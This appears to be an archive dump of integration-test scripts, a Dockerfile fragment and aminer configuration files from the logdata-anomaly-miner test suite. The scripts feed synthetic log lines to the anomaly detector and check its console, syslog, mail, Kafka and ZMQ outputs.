755 /distritest.sh RUN git clone -b $varbranch https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git /opt/wiki RUN awk '/^```yaml$/ && ++n == 1, /^```$/' < /opt/wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' | sed '/^```python/ d' > /home/aminer/gettingStarted-config.yml RUN ln -s /etc/aminer/conf-available/generic/ApacheAccessModel.py /etc/aminer/conf-enabled/ RUN echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer USER aminer WORKDIR /home/aminer ENTRYPOINT ["/distritest.sh"] logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/000077500000000000000000000000001500476301700233245ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/aminerIntegrationTest.sh000077500000000000000000000050521500476301700302040ustar00rootroot00000000000000#!/bin/bash #To add more log lines following positions must be changed: main script, checkAllOutputs, isExpectedOutput. The Position is marked with a "ADD HERE" comment. . ../testFunctions.sh . ./declarations.sh AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* LOGFILE=/tmp/syslog sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null echo "Integration test started.." echo "" CFG_PATH=/tmp/config.py if ! test -f "$CFG_PATH"; then echo "$CFG_PATH does not exist!" exit 1 fi time=`date +%s` #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $LOGFILE #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $LOGFILE #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $LOGFILE #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $LOGFILE #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $LOGFILE #ADD HERE runAminerUntilEnd "sudo aminer --config $CFG_PATH" "$LOGFILE" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "/tmp/output" checkAllOutputs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then echo "" echo "all mails were found in the mailbox!" echo "finished test successfully.." else echo "" echo "test failed at checking mails.." exit 1 fi else echo "" echo "test failed at checking outputs.." exit 1 fi exit 0 logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/aminerIntegrationTest2.sh000077500000000000000000000173751500476301700303010ustar00rootroot00000000000000#!/bin/bash #To add more log lines following positions must be changed: main script, checkAllOutputs, isExpectedOutput. The Position is marked with a "ADD HERE" comment. . ./declarations.sh NUMBER_OF_LOG_LINES=7 OUT=/tmp/output SYSLOG=/tmp/syslog AUTH=/tmp/auth.log ZMQ=/tmp/zmq AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $SYSLOG 2> /dev/null sudo rm $AUTH 2> /dev/null sudo rm $OUT 2> /dev/null echo "Integration test started.." echo "" CFG_PATH21=/tmp/config21.py if ! test -f "$CFG_PATH21"; then echo "$CFG_PATH21 does not exist!" exit 1 fi CFG_PATH22=/tmp/config22.py if ! test -f "$CFG_PATH22"; then echo "$CFG_PATH22 does not exist!" exit 1 fi #< /dev/null & DOWNLOAD_PID=$! #start aminer sudo aminer --config $CFG_PATH21 > $OUT & PID=$! for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $SYSLOG sleep 1 #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") > $AUTH sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $AUTH sleep 1 #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $AUTH sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $AUTH sleep 1 #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG sleep 1 #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $AUTH #ADD HERE #stop aminer sleep 3 sudo pkill -x aminer.py sudo pkill -x aminer wait $PID checkAllOutputs if [ $? == 0 ]; then checkAllSyslogs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then echo "" echo "all mails were found in the mailbox!" echo "finished test successfully.." else echo "" echo "test failed at checking mails.." exit 1 fi else echo "" echo "test failed at checking syslogs.." exit 1 fi else echo "" echo "test failed at checking outputs.." exit 1 fi echo "" echo "part 1 finished" echo "" #END AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $SYSLOG 2> /dev/null sudo rm $AUTH 2> /dev/null sudo rm $OUT 2> /dev/null sudo cp ../unit/data/kafka-client.conf /etc/aminer/kafka-client.conf wait $DOWNLOAD_PID tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 10 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sleep 10 COUNTER=0 /usr/lib/logdata-anomaly-miner/.venv/bin/python3 /tmp/zmq_subscriber.py & ZMQ_PID=$! #start aminer sudo aminer --config $CFG_PATH22 > $OUT & PID=$! for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $SYSLOG for i in {1..60}; do grep "System rebooted for hard disk upgrad" $OUT > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") > $AUTH for i in {1..60}; do grep "System rebooted for hard disk upgrade" $OUT > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 3 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $AUTH sleep 3 #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 3 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $AUTH sleep 3 #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 3 #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $AUTH for i in {1..60}; do grep "The Path of the home directory shown by pwd of the user root is: /root" $OUT > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG for i in {1..60}; do grep "The Path of the home directory shown by pwd of the user user is: /home/user" $OUT > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $AUTH for i in {1..60}; do grep "The Path of the home directory shown by pwd of the user guest is: /home/guest" $OUT > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done #ADD HERE #stop aminer sleep 20 sudo pkill -x aminer.py sudo pkill -x aminer wait $PID sleep 15 # leave the kafka handler some time. sudo kill $ZMQ_PID result=0 checkAllOutputs if [ $? == 0 ]; then checkAllSyslogs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then checkKafkaTopic if [ $? == 0 ]; then checkZmqTopic if [ $? == 0 ]; then echo "" echo "all zmq outputs were found!" echo "finished test successfully.." else echo "" echo "test failed at checking zmq topic.." result=1 fi else echo "" echo "test failed at checking kafka topic.." result=1 fi else echo "" echo "test failed at checking mails.." result=1 fi else echo "" echo "test failed at checking syslogs.." result=1 fi else echo "" echo "test failed at checking outputs.." result=1 fi echo "" echo "part 2 finished" sudo $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null sudo $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs sudo rm /etc/aminer/kafka-client.conf sudo rm /tmp/zmq sudo rm /tmp/aminer exit $result logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/config.py000066400000000000000000000173301500476301700251470ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [atom_filter], anomaly_event_handlers, use_real_time=True) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/config21.py000066400000000000000000000203011500476301700253020ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog', 'file:///tmp/auth.log'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_writer_event_handler = SyslogWriterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler, syslog_writer_event_handler] from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync simple_multisource_atom_sync = SimpleMultisourceAtomSync([atom_filter], 9) analysis_context.register_component(simple_multisource_atom_sync, component_name="SimpleMultisourceAtomSync") # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_multisource_atom_sync], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/config22.py000066400000000000000000000227071500476301700253170ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog', 'file:///tmp/auth.log'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement import datetime from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S', datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_writer_event_handler = SyslogWriterEventHandler(analysis_context) from aminer.events.KafkaEventHandler import KafkaEventHandler kafka_event_handler = KafkaEventHandler(analysis_context, 'test_topic', { 'bootstrap_servers': ['localhost:9092'], 'api_version': (2, 0, 1)}) from aminer.events.ZmqEventHandler import ZmqEventHandler zmq_event_handler = ZmqEventHandler(analysis_context, 'test_topic') from aminer.events.JsonConverterHandler import JsonConverterHandler json_converter_handler = JsonConverterHandler([kafka_event_handler, zmq_event_handler], analysis_context) from aminer.events.ScoringEventHandler import ScoringEventHandler scoring_event_handler = ScoringEventHandler([json_converter_handler], analysis_context) anomaly_event_handlers = [stream_printer_event_handler, syslog_writer_event_handler, json_converter_handler, scoring_event_handler] from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync simple_multisource_atom_sync = SimpleMultisourceAtomSync([atom_filter], 9) # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_multisource_atom_sync], anomaly_event_handlers, default_timestamp_path_list=['model/DiskUpgrade/DTM'], use_real_time=True) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) 